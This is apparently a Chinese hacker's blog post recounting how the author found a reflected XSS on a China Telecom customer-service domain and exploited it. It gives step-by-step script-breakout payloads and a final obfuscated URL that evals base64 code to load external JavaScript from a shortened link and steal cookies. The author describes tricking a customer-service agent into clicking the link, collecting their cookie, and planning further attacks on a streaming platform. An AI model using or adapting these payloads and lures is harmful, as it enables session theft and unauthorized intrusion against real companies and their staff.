记一次电信反射xss的挖掘与利用
0X0、前言
早上起床,打开手机习惯性刷刷新闻,却发现网络无法连接,本以为是光猫出现了问题,后来发现是忘记续费,欠费了。
在网上充值完之后,等了有将近十分钟,网依旧没恢复。随打了个电话给客服,客服在后台帮忙刷新了一下数据,一分钟后网络就恢复了。
在我打了个非常满意评价后,客服发了个短信给我,短信内容是这样子的。
点开链接,页面跳转一下,发现是一个客户自检网络,修复网络故障的页面。(上网账号和城市做了修改)
心想这里会不会有点什么呢?
搞事心态一起,那么就研究研究吧。
0x1、反射XSS的挖掘
抽出短信里面的url,去urlencode得到这样的url:
http://im.189.cn/t/scrtv?h784cr&k=50|hello
对比页面发现:其中的k是城市id,|后面的也即是上面的hello是上网账号。
看到'原样'输出,第一个想法就是这里会不会存在个反射xss?
先看后面的账号输出,搜索一下网页源码,看看输出hello的地方有几个?
观察页面发现存在两个地方输出,一个是在标签内:
一个是在js内:
首先我们尝试一下第一个,输出在标签属性里面。要想构造xss,就得想办法闭合标签,写入标签的其它属性,或者构造其它标签。
因为输出是在value=""内,被双引号包围,那么我们尝试用双引号去闭合前面的标签,然后插入我们想要的东西。
先测试一下双引号有没有被过滤:
"testtesttest
结果发现双引号被过滤了,这个输出点没办法闭合,那么也就没法利用了。
我们再看输出在js内的。两个点都是用单引号闭合的,那么单引号会不会也被过滤呢?
'testtesttest
可以发现,成功插入了一个单引号,单引号没有被过滤。那么我们就可以尝试构造xss payload了。
先用单引号和右花括号闭合前面语句,再用</script>强制闭合前面的<script>,然后添加一个<script>,再之后是xsspayload,后面用单引号闭合后面的单引号。
那么最终的payload是这样子的
http://im.189.cn/t/scrtv?h784cr&k=50|'}</script><script>alert(1);'
期待之中的弹框并没有出现,然后又发现我们插入的右花括号也被过滤了
看一下console,再仔细看了一下输出点,发现下面的一个输出,后面还有一个右括号,没有闭合
点击source里面看看
发现这里存在三处语法错误,最严重的的是第二对<script>里面的function没有闭合,因为过滤了右花括号,其次是闭合的两个地方一个带有括号,一个没有,如果构造闭合,一定会造成一个闭合了另外一个没有闭合,都会造成语法错误,最终也是没办法执行的。。
我们把目光放到别的地方,寻找另外一个输入的输出。也就是k的输出的地方。
我们发现其在js内的输出有两个地方
而且都是被单引号包围的。
这里我们就可以轻松构造xss payload
http://im.189.cn/t/scrtv?h784cr&k=';</script><script>alert(1);'|hello
成功弹框:
我们查看源码看看
可以发现刚刚好闭合了后面的单引号,主要是因为两个输出的地方都是由单引号包围,没有其他字符。
仔细分析一下代码,其实这里也是存在有语法错误的。
1,第一个是在第一对script里面,config没有闭合;
2,第二个是在第二对script里面,只有一个右花括号(}),没有与之配对的左花括号配对。
这里能够执行,主要是因为第三个script里面闭合的好,没有造成语法错误。最终alert(1)是在第三个script里面执行出来的。
0x02、漏洞利用
那么,在挖掘到了一个反射xss,我们应该怎么利用呢?
因为是反射xss,那么势必是要让别人去点链接的。
但是我们的payload还只是弹框而已,为了能够打cookie之类的,我们需要引入外部的js,随便找了一下网上的xss平台。
构造一下payload:
http://im.189.cn/t/scrtv?h784cr&k=';</script><script>eval(atob(location.hash.substr(1)));'|hello#s=document.createElement('script');document.body.appendChild(s);s.src='http://t.cn/XXX';
简单解析一下payload,其实就是获取当前链接#后面的字符,然后base64解码,传进eval里面执行,至于#后面的base64密文的作用是创建script标签,引入外部js。
但这样子是不行的,我们需要编码伪造一下,好让人不那么容易被察觉,最终payload如下:
http://im.189.cn/t/scrtv?h784cr&k=%27%3B%3C/script%3E%3Cscript%3Eeval(atob(location.hash.substr(1)))%3B%27%7C1212003238@163.gd#cz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8vdC5jbi9YWFhYJzs=
因为这个洞是在im.189.cn域名下的,那么我们可以做的就是寻找该域名下的一切业务,然后分析寻找与别人交互的地方。
访问im.189.cn发现,这是一个电信客服相关业务的域名。
那么我们是不是能够打一下电信客服后台的cookie呢?
找到客服页面
然后就是一堆有的没的闲聊,这里发一下聊天记录,成功让他点了我们的链接。
刚开始那个死活不点链接,后来转到深圳的就麻利的点了。
后台成功收到了cookie
但是发现也没啥卵用,莫名处于未登录状态的,又不知道后台地址,也是搞不了。
然后翻了翻度娘,发现该域名还有一个直播平台
嘿嘿,我似乎又知道了目标。但是发言要登录,而登录又要电信手机卡。妈的,没有电信手机卡。算了,暂时不搞了。
那么这一次xss的挖掘与利用就到这里结束了。
0x03 结束
把技术学习融于生活,在生活里面找到乐趣!
有时间再搞搞那个直播平台,嘿嘿~